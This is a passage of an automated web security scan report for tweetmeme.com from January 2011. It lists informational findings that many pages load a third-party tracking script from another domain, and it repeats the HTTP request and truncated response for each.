Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:50:42 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00010299682617188
X-Served-In: 0.0056250095367432
X-Served-By: h02
Content-Length: 23612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.357. http://tweetmeme.com/about/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/privacy

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/privacy HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:49:45 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00013995170593262
X-Served-In: 0.0065500736236572
X-Served-By: h02
Content-Length: 23922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Pri
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.358. http://tweetmeme.com/about/pro

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/pro

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/pro HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:48:29 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 7.7962875366211E-5
X-Served-In: 0.0068199634552002
X-Served-By: h01
Content-Length: 24111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.359. http://tweetmeme.com/about/pro/signup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/pro/signup

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/pro/signup HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:50:35 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 7.0095062255859E-5
X-Served-In: 0.0051848888397217
X-Served-By: h01
Content-Length: 23032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.360. http://tweetmeme.com/about/retweet_button

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/retweet_button

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/retweet_button HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:48:49 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 8.8214874267578E-5
X-Served-In: 0.0063040256500244
X-Served-By: ded2059
Content-Length: 26519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twi
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.361. http://tweetmeme.com/about/terms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /about/terms

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /about/terms HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:49:44 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 7.2002410888672E-5
X-Served-In: 0.0048558712005615
X-Served-By: h03
Content-Length: 26891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Ter
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.362. http://tweetmeme.com/category/comedy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/comedy

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/comedy HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:21:24 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0052080154418945
X-Served-In: 0.047092914581299
X-Served-By: h00
Content-Length: 55895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Com
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.363. http://tweetmeme.com/category/comedy-animals

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/comedy-animals

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/comedy-animals HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:21:29 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0045111179351807
X-Served-In: 1.9421181678772
X-Served-By: h04
Content-Length: 54018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Ani
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.364. http://tweetmeme.com/category/comedy-fail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/comedy-fail

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/comedy-fail HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:21:38 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0079748630523682
X-Served-In: 0.053991079330444
X-Served-By: h02
Content-Length: 51408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Fai
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.365. http://tweetmeme.com/category/entertainment

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/entertainment

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/entertainment HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:21:47 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0060420036315918
X-Served-In: 0.051208019256592
X-Served-By: h04
Content-Length: 56691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Ent
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.366. http://tweetmeme.com/category/entertainment-celebrity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/entertainment-celebrity

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/entertainment-celebrity HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:22:13 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0036988258361816
X-Served-In: 0.049623966217041
X-Served-By: h02
Content-Length: 56785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Cel
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.367. http://tweetmeme.com/category/entertainment-comicsanimation

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/entertainment-comicsanimation

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/entertainment-comicsanimation HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:22:21 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0046210289001465
X-Served-In: 0.051233053207397
X-Served-By: ded2060
Content-Length: 55631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Com
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.368. http://tweetmeme.com/category/entertainment-movies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/entertainment-movies

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/entertainment-movies HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:22:34 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0033931732177734
X-Served-In: 0.045629978179932
X-Served-By: ded2059
Content-Length: 54445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Mov
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.369. http://tweetmeme.com/category/entertainment-music

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/entertainment-music

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/entertainment-music HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:22:37 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037040710449219
X-Served-In: 0.044925212860107
X-Served-By: ded2061
Content-Length: 54709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Mus
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.370. http://tweetmeme.com/category/entertainment-television

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/entertainment-television

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/entertainment-television HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:23:00 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0036180019378662
X-Served-In: 0.045284986495972
X-Served-By: ded2061
Content-Length: 54886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Tel
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.371. http://tweetmeme.com/category/gaming

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/gaming

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/gaming HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:23:08 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0071480274200439
X-Served-In: 0.052395105361938
X-Served-By: h03
Content-Length: 58950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Gam
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.372. http://tweetmeme.com/category/gaming-nintendo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/gaming-nintendo

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/gaming-nintendo HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:23:26 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.016584157943726
X-Served-In: 0.39349889755249
X-Served-By: h00
Content-Length: 40821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Nin
...[SNIP]...
